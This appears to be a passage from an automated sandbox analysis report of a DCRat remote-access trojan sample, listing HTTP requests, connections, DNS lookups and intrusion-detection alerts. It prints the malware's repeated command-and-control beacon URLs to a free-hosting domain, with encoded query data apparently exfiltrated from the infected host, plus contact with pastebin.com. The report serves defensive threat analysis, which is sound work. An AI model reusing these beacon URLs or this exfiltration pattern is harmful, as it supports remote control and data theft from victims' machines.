0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2672
csrss.exe
172.67.34.170:443
pastebin.com
CLOUDFLARENET
US
unknown
2672
csrss.exe
145.14.144.105:80
hfriewofhewuiui342423.000webhostapp.com
Hostinger International Limited
NL
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.68.143
  • 104.20.67.143
shared
hfriewofhewuiui342423.000webhostapp.com
  • 145.14.144.105
unknown

Threats

PID
Process
Class
Message
1080
svchost.exe
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
1080
svchost.exe
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2672
csrss.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
2672
csrss.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2 ETPRO signatures available at the full report
No debug info